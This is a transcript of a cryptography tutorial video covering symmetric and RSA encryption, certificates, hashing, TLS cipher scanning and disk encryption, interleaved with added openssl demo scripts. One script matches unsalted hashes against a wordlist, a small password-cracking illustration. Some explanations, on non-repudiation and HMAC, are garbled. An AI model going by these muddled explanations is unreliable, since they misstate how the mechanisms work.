Let me just demonstrate how symmetric key cryptography works. So for this we can use a tool called AESCrypt. So AESCrypt is actually available for Linux and Windows and Mac, all the systems. So I'm using it on the Windows one, and I'm using the console version. So first of all, I have a text file called text.txt. So let me just show that to you. So as you guys can see, I have this thing called text.txt. Now let me just show what text.txt contains. So as you guys can see, it has a sentence: "The quick brown fox jumped over the lazy dog." So that's the sentence that has all the alphabets in the English language. So now we are going to try and encrypt it, so we can use something like AES or DES, because both of them are symmetric key ciphers, symmetric key algorithms rather. So we are using AES in this case. So what we're going to do is say aescrypt, I'm going to encrypt it, and we're going to give the password of, let's say, Pokemon; we're going to call it Pokemon, and regarding text.txt, we're going to encrypt that file. So now we have encrypted that file. Let's go see, we must be having a new file. So this is called text.txt.aes. So that is our encrypted file, and this is what we would generally send over the network if we are sending it to anybody. So let's assume the person who's received it also knows our encryption algorithm, I mean the encryption algorithm and the key that goes along with it. So let's try to decrypt it now. Now before I decrypt it, let me just show you what an encrypted message looks like. So this is what the ciphertext looks like, so text.txt.aes. So yeah, as you guys can see, the Windows console just shows everything scrambled, but if I were to go into the file here and just open it with Notepad++, you'll see that it's a bunch of crap. You really can't make out anything of what is being made here; we can't really decipher much. So that's the point of using encryption. Now if you were to decrypt it, all you have to do is aescrypt, we're turning to decrypt, we're going to give the password, what was the password, Pokemon, okay, and we're going to try and decrypt text.txt.aes. Let's dir that again. Okay, so that just decrypts our message for us. So this is how you would use AESCrypt for encryption and decryption. So that's just decryption, and that's how you would use symmetric key encryption to encrypt a file.

For this example, symmetric key uses either a stream cipher or a block cipher, and the difference between stream and block ciphers is that block takes a block of bits at a time, and it's a fixed length, for example 64 bits. If I were to use a block cipher with 64 bits, I would need to take in 64 bits before I could start encrypting. Now if I didn't have 64 bits to encrypt, I would have to fill it with padding in order to get up to 64 bits. A stream cipher, on the other hand, will encrypt a bit at a time. So it doesn't matter how many bits you've got; you don't need to have some multiple of the block length in order to encrypt without padding.
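The padding behaviour just described, as an added example that is not part of the course: it runs AES through the openssl CLI (assumed installed) in a block mode (CBC, padded to 16-byte AES blocks) and in a stream mode (CTR, no padding), with a constructed key and IV.

```shell
#!/bin/sh
# Added example, not part of the course: the block-versus-stream padding point
# from the lesson, shown with the openssl CLI (assumed installed). AES-256-CBC
# is a block mode, so ciphertext is padded up to a whole 16-byte AES block;
# AES-256-CTR runs AES as a stream cipher, so ciphertext length equals the
# plaintext length. Key and IV are constructed demo values, not secrets.
set -eu

KEY=000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f  # 32 bytes (256-bit) hex
IV=0f0e0d0c0b0a09080706050403020100                                   # 16 bytes hex

# Encrypt a string under the given mode (e.g. -aes-256-cbc) with the raw key
# and IV, and print the ciphertext length in bytes. -K/-iv avoid the
# "Salted__" header that password mode would add, so only ciphertext is counted.
cipher_len() {
    mode="$1"
    plaintext="$2"
    printf '%s' "$plaintext" \
        | openssl enc "$mode" -K "$KEY" -iv "$IV" \
        | wc -c | tr -d ' '
}

# Encrypt then decrypt under the same mode and print the recovered plaintext.
roundtrip() {
    mode="$1"
    plaintext="$2"
    printf '%s' "$plaintext" \
        | openssl enc "$mode" -K "$KEY" -iv "$IV" \
        | openssl enc -d "$mode" -K "$KEY" -iv "$IV"
}

# Bytes of padding the block mode had to add to reach a block boundary.
padding_bytes() {
    plaintext="$1"
    plain_len=$(printf '%s' "$plaintext" | wc -c | tr -d ' ')
    echo $(( $(cipher_len -aes-256-cbc "$plaintext") - plain_len ))
}

# Stand-alone run: compare the two modes on a 5-byte and a 16-byte input.
for mode in -aes-256-cbc -aes-256-ctr; do
    echo "$mode: 'hello' -> $(cipher_len "$mode" hello) bytes," \
         "16-byte input -> $(cipher_len "$mode" 0123456789abcdef) bytes"
done
echo "CBC padding added to 'hello': $(padding_bytes hello) bytes"
```

Note that a 16-byte input still grows to 32 bytes under CBC: PKCS#7 padding always adds at least one byte, so a full block of padding is appended.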

And another type of cryptography is asymmetric. Now asymmetric, as you would expect, uses two different keys, and that's where we have a public key and a private key. Asymmetric key cryptography uses a longer key length and also has more computation, and the encryption process is slower with asymmetric key encryption than with symmetric key encryption. One use for asymmetric keys is for signing documents or emails, for example: I would have the private key sign something, and the public key would be used to verify the signature. And another reason for using asymmetric key encryption is to ensure that you got it from who actually sent it, since you've got two keys; you always know who the other end of the equation is. Whereas with a symmetric key, since it's just one key, if you can intercept the key you can decrypt and also encrypt messages, and so if somebody can figure out the key, they can break into a communication stream using symmetric key encryption. So asymmetric gives you the advantage of ensuring that the other end is who the other end says they are, since they're the only ones who should have the private key.

In practice, however, hybrid encryption models tend to be used, and that's where you would use asymmetric encryption to encrypt symmetric session keys. So basically you encrypt the message that you are sending using symmetric key encryption, and then when exchanging the key with somebody else you use asymmetric key encryption. So this is going to be a slower process; you probably won't want to use it for larger files. In order to do that, fortunately the file example that I have is a smaller one.

So I'm going to try and generate a key right now. So for this we have to head over to our Ubuntu system. So let's see. Let me show you how public key encryption actually works, and we are going to first create a key. So let me just clear this out for you. First of all, let's create a file, and let's call that text.txt. Now, if you see, we are going to edit text.txt to have some text in it. So there seems to be a GDK warning; I'll just use echo instead. So now let's see if that is in our file. Okay.

So let me just show you how asymmetric key encryption, or public key cryptography, works. So first of all, we need a text file. So let me see, do we have a text file? So there seems to be a text.txt. So let's see what this text.txt says; so it says that this is a random text file. Now, what we want to do is we want to create a public key first, so I'm going to use openssl for doing this. So we go openssl, and we are going to use it with RSA, so we're trying to generate a key, so genrsa, and we're going to use des3, and we're going to output it into a file called private.key. So we are also going to be using 4096 bits. So this is going to be our private key. So this will create a private key using the RSA algorithm. So let it work its way out. So first of all, it's asking me for the passphrase now, since you can protect your keys with a passphrase. So I'm just going to use my name. Okay. So now we see, if we ls, we have a private key, I guess. Yep. So we have this private key.

Now, using this private key, we are going to generate a public key. So for this I'm again going to be using openssl, and openssl is Unix-based, so you will need a Unix system. So you go rsautl, that's the RSA utility, and what we want to do is encrypt, and we want the public key in, and we want to use the public key that we just generated. I'm sorry guys. So we are going to be using openssl rsa. So first of all, we need to generate a public key. So for that we use the private key. So we will give the private key as an argument after the -in flag, so private.key, and we are trying to get out a public key, so -pubout, and we're going to call it public.key. Okay, so there seems to be... okay, I messed it up a little, I forgot to give the output, so you go -out and then you use public.key. So it's asking me for a passphrase, and now it's writing the RSA key, and since the password was correct, we have a public key too. So if you see, now we have a public key and a private key.

So we are going to encrypt our file using the public key. So we go openssl, and we go rsautl, and we go -encrypt, and we can do -pubin, so we are going to use the public key, and we want to put text.txt as the file to be encrypted, so text.txt, and what we want to output is an encrypted file, so encrypted.txt. Okay, I typed it as opensll; need to go and edit that out. Yeah, so that makes it a correct command, and now we have an encrypted file. So let's see, ls, and yep, encrypted.txt. So if you just cat that out, we see it's a bunch of garbage and we really can't read it unless we decrypt it.

So for decrypting, all we have to do is again use openssl. Let's clear this out first, so openssl, and we are going to be using the RSA utility again, so rsautl. We're going to decrypt this time, so we go with the -decrypt flag, and then we are going to be giving the -inkey, and that is going to be the private key, and what we want to decrypt is encrypted.txt, and what we want to output it as is, let's say, plaintext.txt. So it's going to ask me for my passphrase, which is my name, and I've entered the passphrase and now we have a plaintext.txt. Now, if we go and ls, we see that we have a plaintext.txt out here. Let me just cat that out. So plaintext.txt: "This is a random text file." And if you go up we see that it was a bunch of garbage, and before that it was a random text file. Now, you can also run this command called diff: diff plaintext.txt text.txt. So this gives you the difference in the text strings. So it's zero, so it gives you that there's no difference. So both files are the same, and that's how public key cryptography works, and how symmetric key cryptography works.
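The hybrid model described above, and the sign-with-private / verify-with-public use of the key pair, as an added example that is not the course's own commands: it uses the openssl CLI (1.1.1 or later assumed, for pkeyutl and -pbkdf2) with a constructed passphrase, file names and contents.

```shell
#!/bin/sh
# Added example, not the course's own commands: the hybrid model the lesson
# describes, with the openssl CLI (1.1.1 or later assumed, for pkeyutl and
# -pbkdf2). RSA wraps only a small random session key; AES encrypts the file,
# which is what makes the scheme practical for large data. The second half
# shows the lesson's other use of the key pair: private key signs, public key
# verifies. Passphrase, file names and contents are constructed sample values.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
PASSPHRASE="constructed-passphrase"

# Passphrase-protected RSA private key, then the public key derived from it
# (the lesson's genrsa / rsa -pubout steps).
ensure_keys() {
    [ -f "$WORK/private.key" ] && return 0
    openssl genrsa -aes256 -passout "pass:$PASSPHRASE" -out "$WORK/private.key" 2048 2>/dev/null
    openssl rsa -in "$WORK/private.key" -passin "pass:$PASSPHRASE" \
        -pubout -out "$WORK/public.key" 2>/dev/null
}

# Sender side. Produces <file>.enc (AES ciphertext) and <file>.key.enc (the
# one-time session key, encrypted to the receiver's public key).
hybrid_encrypt() {
    infile="$1"
    openssl rand -hex 32 > "$WORK/session.key"   # fresh 256-bit key, used once
    openssl enc -aes-256-cbc -pbkdf2 -pass "file:$WORK/session.key" \
        -in "$infile" -out "$infile.enc"
    openssl pkeyutl -encrypt -pubin -inkey "$WORK/public.key" \
        -in "$WORK/session.key" -out "$infile.key.enc"
    rm "$WORK/session.key"                        # sender keeps no copy
}

# Receiver side: only the private key can unwrap the session key.
hybrid_decrypt() {
    infile="$1"
    outfile="$2"
    openssl pkeyutl -decrypt -inkey "$WORK/private.key" -passin "pass:$PASSPHRASE" \
        -in "$infile.key.enc" -out "$WORK/session.key"
    openssl enc -d -aes-256-cbc -pbkdf2 -pass "file:$WORK/session.key" \
        -in "$infile.enc" -out "$outfile"
    rm "$WORK/session.key"
}

# Full round trip; prints "same" when the decrypted file equals the original
# (the lesson's diff check).
roundtrip_matches() {
    ensure_keys
    printf 'This is a random text file.\n' > "$WORK/text.txt"
    hybrid_encrypt "$WORK/text.txt"
    hybrid_decrypt "$WORK/text.txt" "$WORK/plaintext.txt"
    if cmp -s "$WORK/text.txt" "$WORK/plaintext.txt"; then echo same; else echo different; fi
}

# Verify a detached signature with the public key; prints valid or invalid.
verify_sig() {
    if openssl dgst -sha256 -verify "$WORK/public.key" -signature "$2" "$1" >/dev/null 2>&1
    then echo valid; else echo invalid; fi
}

# Sign with the private key, verify with the public key, then verify again
# after the document is altered. Prints "<original> <altered>", e.g. "valid invalid".
signature_check() {
    ensure_keys
    printf 'Pay the bearer 100 units.\n' > "$WORK/doc.txt"
    openssl dgst -sha256 -sign "$WORK/private.key" -passin "pass:$PASSPHRASE" \
        -out "$WORK/doc.sig" "$WORK/doc.txt"
    first=$(verify_sig "$WORK/doc.txt" "$WORK/doc.sig")
    printf 'Pay the bearer 1000 units.\n' > "$WORK/doc.txt"   # tampered copy
    second=$(verify_sig "$WORK/doc.txt" "$WORK/doc.sig")
    echo "$first $second"
}

# Stand-alone run.
echo "hybrid round trip: $(roundtrip_matches)"
echo "signature original/altered: $(signature_check)"
```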

Okay. Now, moving ahead from cryptography, let's talk about certificates. Okay. So now that we're done with cryptography, let's talk about digital certificates.

So what is a digital certificate? Well, a digital certificate is an electronic passport that allows a person or organization to exchange data securely over the internet using public key infrastructure. So a digital certificate is also known as a public key certificate or an identity certificate. Now, digital certificates are a means by which consumers and businesses can utilize the security application of public key infrastructure. Public key infrastructure comprises the technology to enable secure e-commerce and internet-based communication.

So what kind of security does a certificate provide? So firstly, it provides identification and authentication: the persons or entities with whom we are communicating are really who they say they are, so that is proved by certificates. So then we have confidentiality: information within a message or transaction is kept confidential; it may only be read and understood by the intended sender. Then there's integrity. Then there's non-repudiation: the sender cannot deny sending the message or transaction, so the receiver really gets non-repudiation, and I'll explain how non-repudiation comes into digital certificates.

So digital certificates are actually issued by authorities who make it their business to actually certify people and their organizations with digital certificates. Now, you can see these on Google Chrome; let me just open Chrome for you guys, and you can see it out here. You can see certificates, and you can go into the issuer statements and all sorts of stuff, so you can see it's issued by Let's Encrypt Authority X3. So that's an issuing authority for digital certificates.

Now that was all about the theory of certificates. Let's go and see how you can create one. To create a digital certificate, we are going to be using the openssl tool again. So first of all, let me show you how to create a certificate. So we are going to be using the openssl tool for that. So first of all, let me clear the screen out. So in this case, I'm going to generate a certificate authority certificate. So I'm doing an RSA key here to use inside the certificate. So first of all, I need to generate a private key. So to do that, as I had just showed you guys, we can use the openssl tool: we go openssl and genrsa, and we're going to use des3, then -out, and let's call it ca.key, and we're going to use 4096. So I'm doing an RSA key here to use inside the certificate; I'm generating a private key, and the private key is used as a part of the certificate, and there's a public key associated with the certificate. So you've got a public and a private key, and data gets encrypted with the public key and then gets decrypted with the private key. So they are mathematically linked, the public and private key, because you need one for one end of the communication and the other for the other end of the communication, and they have to be linked so that the data that gets encrypted with one key gets to be decrypted with the other key. So this is asking for a passphrase, and so I'm going to be giving my name as the passphrase. So that has generated the key for us.

So now I'm going to generate the certificate itself. So I'm going to be using the openssl utility. So first of all, you say openssl req, so it will be a -new request, and it's going to be an -x509 request, it's going to be valid for 365 days, and let's see, the key is going to be ca.key, and we're going to output it into ca, or let's call it edureka.crt. So this is a certificate that I'm producing in the name of the company that I'm working for, so that is Edureka. So it says it's unable to load the private key. Let me just see if the private key exists. I had a previous private key, so let me just remove that. It doesn't have a ca.key; seems like I put the name differently. So let me just try that again: openssl, and we do req, so we are requesting a new certificate, and it's going to be x509, and it's going to be there for 365 days, and the key is, apparently, what it's called out here, and it's going to be output into edureka.crt. So let's enter the passphrase; so it's my name. So now it's going to ask me a bunch of information that's going to be inside the certificate. So let's say it's asking the country name: IN. Then let's put in the state; okay, so state or province name, some state, so Bangalore. Locality, let's say Whitefield. Organization name is Edureka, unit name Brain Force, common name, let's leave that out, email address, let's leave that out too, and we have a certificate. So if you go and list all your files, you'll see that there is a certificate called edureka.crt out here, which is highlighted. Okay.

So now if you want to view this file, you could always use the openssl utility, so you say you want to read an x509 request, and you want it as text, and what you want to see is edureka.crt. Okay, so that is the certificate. So you see that it has all the signature, it has the signature algorithm, it has all the information about the certificate, and it says the issuer is C=IN, and state Bangalore, and location Whitefield, Edureka, Brain Force. It has all sorts of information.

So that was all about digital certificates: who issues digital certificates, where are they useful. So this is basically non-repudiation. So nobody can deny with this certificate: if this certificate is included in some sort of website and that website turns out to be somewhat malicious and there's a complaint, now the website can't go to a court of law and say they didn't know about this, because the certificate that was included had their private key, and the private key was only supposed to be known to the company. So that's non-repudiation: you just can't deny that you did it. Okay, so that was all about certificates; now moving on.
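The certificate procedure above, as an added example that is not the course's own commands, with the checks worth running on the result: read the subject back, confirm the certificate's public key matches the private key, and see how verification behaves with and without a trust store. It assumes the openssl CLI; the subject fields, passphrase and file names are constructed sample values.

```shell
#!/bin/sh
# Added example, not the course's own commands: the self-signed certificate the
# lesson builds with openssl req, plus the checks worth running on it. Assumes
# the openssl CLI. -subj supplies the fields the lesson types at the prompts;
# the subject, passphrase and file names are constructed sample values.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
PASSPHRASE="constructed-passphrase"
SUBJ="/C=IN/ST=Karnataka/L=Whitefield/O=Example Org/OU=Training/CN=example.test"

# RSA private key, then a self-signed X.509 certificate valid for 365 days.
make_cert() {
    openssl genrsa -aes256 -passout "pass:$PASSPHRASE" -out "$WORK/ca.key" 2048 2>/dev/null
    openssl req -new -x509 -days 365 -key "$WORK/ca.key" -passin "pass:$PASSPHRASE" \
        -subj "$SUBJ" -out "$WORK/ca.crt"
}

# Subject as recorded in the certificate (the same data openssl x509 -text prints).
cert_subject() {
    openssl x509 -in "$WORK/ca.crt" -noout -subject
}

# Does the certificate carry the public half of the private key we hold?
# Compare a digest of the public key taken from each.
key_matches_cert() {
    cert_pub=$(openssl x509 -in "$WORK/ca.crt" -noout -pubkey | openssl sha256)
    key_pub=$(openssl rsa -in "$WORK/ca.key" -passin "pass:$PASSPHRASE" -pubout 2>/dev/null | openssl sha256)
    if [ "$cert_pub" = "$key_pub" ]; then echo match; else echo mismatch; fi
}

# Chain verification against a given trust store; a self-signed certificate
# verifies only when it is itself in the store.
verify_with_store() {
    if openssl verify -CAfile "$1" "$WORK/ca.crt" >/dev/null 2>&1; then echo trusted; else echo untrusted; fi
}

# Same check with no trust store at all: this is what a client that does not
# know the issuer sees, hence the browser warning for self-signed certificates.
verify_without_store() {
    if openssl verify -no-CAfile -no-CApath "$WORK/ca.crt" >/dev/null 2>&1; then echo trusted; else echo untrusted; fi
}

# Will the certificate still be valid N days from now? (-checkend takes seconds.)
still_valid_in_days() {
    if openssl x509 -in "$WORK/ca.crt" -noout -checkend $(( $1 * 86400 )) >/dev/null; then echo yes; else echo no; fi
}

# Stand-alone run.
make_cert
cert_subject
echo "key matches cert: $(key_matches_cert)"
echo "self-trust: $(verify_with_store "$WORK/ca.crt"), no trust store: $(verify_without_store)"
echo "valid in 364 days: $(still_valid_in_days 364), in 366 days: $(still_valid_in_days 366)"
```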

Okay. So moving on, we're going to be talking about cryptographic hashing. And while the word cryptography is in the term cryptographic hashing, and it does lead you to believe that there is encryption involved, there is no encryption involved in a cryptographic hash. There is a significant difference between hashing and any sort of encryption, and that is primarily that encryption is a two-way process: when I encrypt a piece of data or a file or anything else, what I'm doing is putting it into a state where I expect to be able to get it back out again; in other words, when I encrypt a file, I expect to be able to decrypt the file and get the original contents. Hashing, on the other hand, is a one-way function. Once I've hashed a piece of data or a file, there is no expectation and no ability to get the original piece of data back. Hashing generates a fixed-length value, and different types of hashing will generate different length values. For example, MD5 will generate a different length value than SHA-1; they're both hashing algorithms, but they generate different length values. And the resulting value from a hash function should have no relation at all to the original piece of data. As a matter of fact, if two inputs generate the same hash value, it's called a collision, and if you can generate collisions, you may be able to get to a point where you can generate a piece of data that is going to generate the same hash value, and that leads you to the potential ability to break the particular hashing algorithm that you're using.

So what can we use hashes for? Well, one thing we can use hashes for is file integrity. We can run a hash on a file and get a value back, and later we can check the value to make sure it's the same; if it's the same, I can be sure that the same file was hashed in both instances. So let me just show you an example of what I just said, that if we hash a file we will get the same hash every time. So remember the certificate that we just created. Let me just log in again. So we are going to hash this certificate, and it will create a certain hash, and we are going to see that every time we hash it we are getting the same hash. So we can use this command called md5sum, and we can do edureka.crt. So this is the hash produced after you've hashed edureka.crt. So if I do an md5sum again, so md5 is a hashing algorithm, so md5sum edureka.crt, and it will produce the very same hash. Let's see how SHA-1 works: so sha1sum edureka.crt. Okay, so sha1sum is the SHA-1 version of the tool. Okay, so I proved my point that with md5, which is a cryptographic hashing algorithm, we are getting the same hash back. So if you are able to produce the same hash from different data, that means you have broken the algorithm in itself. So you run md5sum on Linux; you can get a version of the md5 summing program on Windows, and on Mac OS there's the utility md5 that does the same thing. So I just showed you the file and I hashed it.

And another reason we use hashing is when we are storing passwords. So passwords are stored after hashing; we hash passwords. And the reason for hashing the password is so you're not storing the password in clear text, which would be easily seen if you only had it protected with loose permissions. If I hash a password, every time I hash the password I'm going to get the same value back from the same algorithm. So what I do is store the hash in some sort of password database. Since it's a one-way function, you can't get the password back directly from the hash. Now what you can do, and what most password cracking programs do, is some variation of this: you just generate hashes against a list of words, and if you get a hash value that matches the one in the password database, once you get the hash that matches the one in the password database, you know what the password is. And here we come back to the idea of collisions: if I can take two different strings of characters and get the same values back, it's easier to crack the password, because I don't necessarily need to get the password; if the hash that I get back from a particular string of data is the same as the one I get from the original password, then it doesn't matter whether I know the password, because the string of data that I put in is going to generate the same hash value that you're going to compare when you log in, and this hash value will just be accepted as valid and you will be able to log in. So suppose the password that you chose while making your account is "dog", and the word dog produces this hash value, and if I were to hash "cat" with the same algorithm, and if the algorithm was prone to collisions, it might produce the same hash value as dog. So with the password cat I could open up your password, I mean I could open up your account. So that was all about hashing and hashing algorithms. Let's move on.
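The hashing properties just discussed, as an added example that is not the course's own commands: the openssl CLI (1.1.1 or later assumed, for "passwd -6") stands in for md5sum/sha1sum, and the block goes one step past the lesson by showing why stored password hashes are salted. File contents, the wordlist and the salts are constructed sample values.

```shell
#!/bin/sh
# Added example, not the course's own commands: the hashing properties the
# lesson demonstrates with md5sum/sha1sum, done with the openssl CLI (1.1.1 or
# later assumed, for "passwd -6"). Shows fixed output length per algorithm,
# the same digest every time for the same file, a completely different digest
# after a one-byte change, and why stored passwords are salted. All inputs
# (file contents, wordlist, salts) are constructed sample values.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Hex digest of a file under the given algorithm (md5, sha1, sha256, ...).
digest() {
    algo="$1"
    file="$2"
    openssl dgst "-$algo" "$file" | awk '{print $NF}'
}

# Hash the same file twice: "same" proves the function is deterministic,
# which is what makes it usable for file-integrity checks.
deterministic() {
    printf 'hello' > "$WORK/a.txt"
    first=$(digest sha256 "$WORK/a.txt")
    second=$(digest sha256 "$WORK/a.txt")
    if [ "$first" = "$second" ]; then echo same; else echo different; fi
}

# Change a single byte and compare: a good hash shows no relation to the input.
one_byte_change() {
    printf 'hello' > "$WORK/a.txt"
    printf 'hellp' > "$WORK/b.txt"
    if [ "$(digest sha256 "$WORK/a.txt")" = "$(digest sha256 "$WORK/b.txt")" ]; then echo same; else echo different; fi
}

# Length in hex characters of the digest for each algorithm (fixed per algorithm).
digest_len() {
    printf 'anything' > "$WORK/c.txt"
    digest "$1" "$WORK/c.txt" | tr -d '\n' | wc -c | tr -d ' '
}

# The lesson's wordlist check: unsalted, fast hashes of a small wordlist can be
# compared directly against a stored hash, which is why such storage is weak.
# Prints the matching word, or "none".
wordlist_match() {
    stored="$1"              # unsalted md5 hex digest from the "database"
    for word in cat bird dog fish; do
        printf '%s' "$word" > "$WORK/w.txt"
        if [ "$(digest md5 "$WORK/w.txt")" = "$stored" ]; then echo "$word"; return 0; fi
    done
    echo none
}

# Salted, slow password hash (SHA-512 crypt). The salt is stored alongside the
# hash; two users with the same password get different stored values, so a
# precomputed wordlist table cannot be reused across accounts.
salted_hash() {
    openssl passwd -6 -salt "$1" "$2"
}

# Stand-alone run.
printf 'dog' > "$WORK/pw.txt"
stored_md5=$(digest md5 "$WORK/pw.txt")
echo "determinism: $(deterministic); one-byte change: $(one_byte_change)"
echo "md5 $(digest_len md5) hex chars, sha1 $(digest_len sha1), sha256 $(digest_len sha256)"
echo "unsalted md5 of 'dog' found in wordlist as: $(wordlist_match "$stored_md5")"
echo "salted for user A: $(salted_hash saltA dog)"
echo "salted for user B: $(salted_hash saltB dog)"
```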

Okay. So in this part of the video we are going to go over SSL and TLS. SSL and TLS are ways of doing encryption, and they were developed in order to do encryption between websites, web servers and clients, or browsers. SSL was originally developed by a company called Netscape, and if you don't remember, Netscape eventually spun off their source code and became the Mozilla project, where we get Firefox from. So back in 1995 Netscape released version 2 of SSL, and there was a version one, but nothing was done with it. So we got version 2 of SSL, and that was used for encryption of web transmission between the server and the browser. Now SSL version 2 had a whole number of flaws, and SSL 2 has the type of flaws that can lead to decryption of messages without actually having the correct keys and not being the right endpoints, and so Netscape released SSL version 3 in 1996. And so we get SSL 3.0, which is better than 2.0, but it still has some issues, and so in 1999 we ended up with TLS. Now SSL is Secure Sockets Layer and TLS is Transport Layer Security. They both accomplish the same sort of thing, and they're designed primarily for doing encryption between web servers and web browsers, because we want to be able to encrypt that type of traffic.

So let me show you what that kind of traffic looks like. So first of all, let me open Wireshark, and out here I already have a TLS capture ready for you guys. You can see we have all sorts of TLS data, so you can see that here's my source and here's the destination, doing a client key exchange and the change cipher spec and encrypted handshake message, and then we start getting application data. So there are some other steps involved here, and you're not seeing all of it with this particular Wireshark capture because, again, you know, we get fragmented packets, and at some point it starts getting encrypted and you can't see it anyway, because Wireshark, without having the key, can't decrypt those messages. But what ends up happening is the client sends a hello and the server responds with a hello, and they end up exchanging information as part of that, including version numbers supported, and you get a random number, and the client is going to send out a number of cipher suites that it wants to support, in the order it can support them, and the server is going to pick from that suite of ciphers. Now, then we start doing the key exchange, and then the change cipher spec from the client and the server, and eventually the server just sends a finished message, and at that point we've got this encrypted communication going on. But there's this handshake that goes on between the two systems, and there's a number of different types of handshakes depending on the type of endpoints that you've got. But that's the type of communication that goes on between servers and the client.

One important thing about using SSL and TLS is, as I mentioned, some of the earlier versions had vulnerabilities in them, and you want to make sure that the servers aren't actually running those. So you want to run some scans to figure out the type of protocols and ciphers that different systems use, so for this we can use something called sslscan. So this is available for Unix; not really sure if there is something that is similar for Windows or Mac, but on Unix-based systems, that is Linux, we can use sslscan. So let me just show you how to use that; clear that out. So what we can do is run sslscan against, suppose, www.edureka.co. So we're doing an SSL scan here against the website, and you can see it's going out and probing all the different types of ciphers. You can see on this system it starts with SSLv3 and goes on to TLS version 1, and we could force sslscan to try to do an SSLv2. If I scroll back up here, I get the cipher suites: this is SSL version 3, it's using RSA, and it's using RSA for the asymmetric part, in order to do the key exchange, and once we get the session key up we're going to use AES 256, and then we're going to use the secure hash algorithm to do the message authentication, or the MAC. It's something called the HMAC, for hashed message authentication code, and what it does is simply hash the MAC, and that's what you would check on one side against the other to make sure that the message hasn't been tampered with in transmission. You can see here all the different types of cipher suites that are available: here's TLS running RC4 at 40 bits using MD5. So that would be a pretty vulnerable type of communication to use between the server and the client; a 40-bit cipher using RC4 is a low-strength cipher, and we would definitely recommend that clients remove those from the supported ciphers that they have on their server. All that configuration would be done at the web server, as well as when you generated your key and your certificates. Normally certificates would be handled by a certificate authority. Now, you can also self-sign certificates and have those installed in your web server in order to encrypt communications with your clients. The challenge with that is browsers today warn when they see a certificate against a certificate authority that isn't trusted, or when it doesn't have any certificate authority at all, so you'll get a warning in your browser indicating there may be a problem with your certificate. If your clients are savvy enough, and if the users are savvy enough, you may be able to make use of these self-signed certificates and save yourself some money, but generally it's not recommended, simply because clients are starting to get used to these bad certificates, and when they run across one that's really a problem, a real rogue certificate, they're going to ignore the certificate message in the browser and just go to the sites that could have malicious purposes in mind, and may end up compromising the clients or customers or users. That's SSL and TLS, and how they work and negotiate between servers and endpoints.
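A small audit of a scanner's cipher-suite list, as an added example that is not part of the course: it flags the entries the lesson calls out (SSLv2/SSLv3, 40-bit export ciphers, RC4, MD5) and a few close relatives, over constructed sample lines in the "Accepted <proto> <bits> bits <suite>" shape that sslscan reports; no host is scanned.

```shell
#!/bin/sh
# Added example, not part of the course: a small audit of the cipher-suite list
# a scanner such as sslscan reports, flagging the weak entries the lesson calls
# out (SSLv2/SSLv3, 40-bit export ciphers, RC4, MD5) plus a few close relatives.
# The scan lines below are constructed sample input in the "Accepted <proto>
# <bits> bits <suite>" shape, not a real scan of any host.
set -eu

SAMPLE_SCAN='Accepted  SSLv3    128 bits  RC4-SHA
Accepted  SSLv3    40 bits   EXP-RC4-MD5
Accepted  TLSv1.0  168 bits  DES-CBC3-SHA
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384
Accepted  TLSv1.3  256 bits  TLS_AES_256_GCM_SHA384'

# classify_suite PROTO BITS SUITE -> "ok" or "WEAK,<reason>[,<reason>...]".
classify_suite() {
    proto="$1"; bits="$2"; suite="$3"
    reasons=""
    case "$proto" in
        SSLv2|SSLv3|TLSv1.0) reasons="$reasons,legacy-protocol:$proto" ;;
    esac
    if [ "$bits" -lt 128 ]; then reasons="$reasons,short-key:${bits}bit"; fi
    case "$suite" in *RC4*)              reasons="$reasons,rc4" ;; esac
    case "$suite" in *MD5*)              reasons="$reasons,md5-mac" ;; esac
    case "$suite" in *DES-CBC3*|*3DES*)  reasons="$reasons,3des" ;; esac
    case "$suite" in *EXP*)              reasons="$reasons,export-grade" ;; esac
    case "$suite" in *NULL*|*ADH*|*AECDH*|*anon*) reasons="$reasons,no-auth-or-no-encryption" ;; esac
    if [ -n "$reasons" ]; then echo "WEAK$reasons"; else echo ok; fi
}

# Read scan lines on stdin and print "<proto> <suite> <verdict>" per accepted suite.
audit_scan() {
    while read -r status proto bits _unit suite _rest; do
        [ "$status" = Accepted ] || continue
        echo "$proto $suite $(classify_suite "$proto" "$bits" "$suite")"
    done
}

# Number of accepted suites that should be removed from the server configuration.
count_weak() {
    printf '%s\n' "$SAMPLE_SCAN" | audit_scan | grep -c WEAK
}

# Stand-alone run.
printf '%s\n' "$SAMPLE_SCAN" | audit_scan
echo "weak suites: $(count_weak)"
```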

Okay.

So now that we've talked


about TLS and SSL.

Let's talk about


disk encryption.

Now this encryption


is actually something

that was not really difficult to


do but sort of out of the reach

of normal desktop computers


for a really long time.

Although there have long been


ways to encryption of files

and to a lesser degree


maybe entire disks

as we get faster processor


certainly encrypting

the entire disks

and being able to encrypt

and decrypt on the fly


without affecting.

Performance is something

that certainly comes


with Within Reach

and it's a feature

that shows up in most modern


operating systems to one degree

or another now these days


we are going to look

at a couple of ways here


of doing disk encryption.

I want to tell you about one of them first, and it's not the one I can show; I can't really show the other one either. So with Microsoft, their Windows systems have this program called BitLocker, and BitLocker requires either Windows Ultimate or Windows Enterprise. I don't happen to have either version, so I can't really show it to you, but I can tell you that BitLocker has the ability to do entire-disk encryption, and it uses AES for the encryption cipher. The thing about BitLocker is that it uses a feature that comes with most modern systems, particularly laptops: a little chip in them that's called the Trusted Platform Module, or TPM. What the TPM chip does is store the keys that allow the operating system to access the disk through this encryption and decryption process, and they use a pretty strong encryption cipher, which is AES. But you have to have one of a couple of different versions of Windows in order to be able to use BitLocker, and it's one of those things you would normally run in an enterprise, and so that's why they included it in the Enterprise version.

Now on the Mac OS side they have this thing called FileVault, and you see it in the System Preferences under Security & Privacy. If you go to FileVault you can turn on FileVault: if you have the little button there that says Turn On FileVault, then you can turn on FileVault and it will ask you about setting up keys, and it works similarly to BitLocker. Now PGP happens to have the ability to do disk encryption as well, and you can see that in the case of this Ubuntu system they've got a package called gdecrypt, which is a GUI that allows you to map and mount a created encrypted volume, so I could run gdecrypt and it would help me set up the process of encrypting the volumes I have got on my system. Now disk encryption is a really good idea, because when you are working with clients the data is normally very sensitive. So, as I mentioned, you can always use things like BitLocker and FileVault or other such software for disk encryption. So what I mentioned before is now not only possible, it's very much a reality with current operating systems.

